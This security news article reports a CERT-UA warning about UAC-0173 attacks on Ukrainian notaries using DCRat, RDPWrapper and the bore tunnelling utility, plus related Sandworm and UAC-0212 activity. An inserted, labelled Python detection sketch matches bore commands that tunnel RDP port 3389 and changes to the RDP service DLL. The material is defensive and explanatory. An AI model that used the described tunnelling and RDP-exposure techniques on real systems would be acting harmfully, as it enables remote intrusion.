CERT-UA warns of UAC-0173 attacks deploying DCRat to compromise Ukrainian notaries


February 26, 2025Ravi LakshmananNetwork Security/Threat Intelligence

On Tuesday, the Computer Emergency Response Team of Ukraine (CERT-UA) warned of renewed activity from an organized criminal group it tracks as UAC-0173, which involves infecting computers with a remote access trojan called DCRat (aka DarkCrystal RAT).

The Ukrainian cybersecurity authority said it observed the latest wave of attacks beginning in mid-January 2025. The activity is designed to target Ukrainian notaries.

The infection chain uses phishing emails that claim to be sent on behalf of the Ukrainian Ministry of Justice and urge recipients to download an executable file. The binaries are hosted on Cloudflare's R2 cloud storage service.


“Having gained key access to the notary's automated workplace in this way, the attackers take measures to add, in particular, RDPWrapper, which implements the functionality of parallel RDP sessions. In conjunction with the use of the bore utility, this makes it possible to establish an RDP connection from the Internet directly to the computer,” CERT-UA said.
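A defender-side sketch of how the combination CERT-UA describes could be flagged in endpoint telemetry. This is an added example, not code from CERT-UA or the original article: the event field names, host names, relay domain and file paths are constructed, and it assumes Sysmon-style registry (ID 13) and process-creation (ID 1) events, RDP Wrapper's usual behaviour of repointing the TermService ServiceDll value, and the bore command-line form `bore local <port> --to <relay>`.

```python
import re

# Stock Terminal Services DLL; RDP Wrapper repoints ServiceDll to its own rdpwrap.dll.
DEFAULT_SERVICEDLL = r"%systemroot%\system32\termsrv.dll"
SERVICEDLL_KEY = r"\services\termservice\parameters\servicedll"
# Matches the assumed bore CLI form; a renamed binary would need hash- or
# network-based detection instead of this name match.
BORE_RE = re.compile(r'\bbore(?:\.exe)?"?\s+local\s+(\d+)\b.*--to\s+(\S+)', re.I)
RDP_PORT = 3389

SAMPLE_EVENTS = [  # constructed for illustration, not taken from the advisory
    {"host": "NOTARY-01", "id": 13,
     "target": r"HKLM\System\CurrentControlSet\Services\TermService\Parameters\ServiceDll",
     "details": r"%ProgramFiles%\RDP Wrapper\rdpwrap.dll"},
    {"host": "NOTARY-01", "id": 1,
     "cmdline": r'"C:\Users\Public\bore.exe" local 3389 --to relay.example.net'},
    {"host": "DEV-07", "id": 1, "cmdline": "bore local 8080 --to relay.example.net"},
    {"host": "NOTARY-02", "id": 13,
     "target": r"HKLM\System\CurrentControlSet\Services\TermService\Parameters\ServiceDll",
     "details": r"%SystemRoot%\System32\termsrv.dll"},
]

def classify(event):
    """Return (kind, detail) for a suspicious event, or None if it is benign."""
    if event["id"] == 13:  # registry value set
        if (event["target"].lower().endswith(SERVICEDLL_KEY)
                and event["details"].lower() != DEFAULT_SERVICEDLL):
            return ("servicedll_replaced", event["details"])
    elif event["id"] == 1:  # process creation
        m = BORE_RE.search(event["cmdline"])
        # Only tunnels that forward the local RDP port are of interest here.
        if m and int(m.group(1)) == RDP_PORT:
            return ("bore_rdp_tunnel", m.group(2))
    return None

def hosts_with_exposed_rdp(events):
    """Hosts showing both signals: patched multi-session RDP and an RDP tunnel."""
    seen = {}
    for ev in events:
        finding = classify(ev)
        if finding:
            seen.setdefault(ev["host"], set()).add(finding[0])
    wanted = {"servicedll_replaced", "bore_rdp_tunnel"}
    return sorted(h for h, kinds in seen.items() if wanted <= kinds)

if __name__ == "__main__":
    print(hosts_with_exposed_rdp(SAMPLE_EVENTS))
```

Either signal alone is worth triage; correlating both on one host narrows the result to the Internet-reachable RDP setup the advisory describes.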

The attacks are also characterized by the use of other tools and malware families, such as Fiddler for intercepting authentication data entered into the web interface of state registers, Nmap for network scanning, and XWorm for stealing sensitive data such as credentials and clipboard content.

Additionally, the compromised system is used as a conduit for drafting and sending malicious emails using the sendmail console utility to further propagate the attack.

The development comes as CERT-UA attributed a sub-cluster within the Sandworm hacking group (aka APT44, Seashell Blizzard, and UAC-0002) to the exploitation of a now-patched security flaw in Microsoft Windows (CVE-2024-38213, CVSS score: 6.5) via booby-trapped documents in late 2024.

The attack chains are known to run PowerShell commands responsible for displaying a decoy file while simultaneously launching additional payloads in the background, including Golang loaders named SecondBest (aka EmpirePast), Spark, and CrookBag.


Activity attributed to UAC-0212 targeted supplier companies in Serbia, the Czech Republic, and Ukraine between July 2024 and February 2025, with some of the attacks recorded against 20 dozen Ukrainian companies specializing in the development of automated process control systems (ACST), electrical work, and freight transport.

Some of these attacks have been documented by StrikeReady Labs and Microsoft, the latter of which tracks the threat group under the moniker BadPilot.
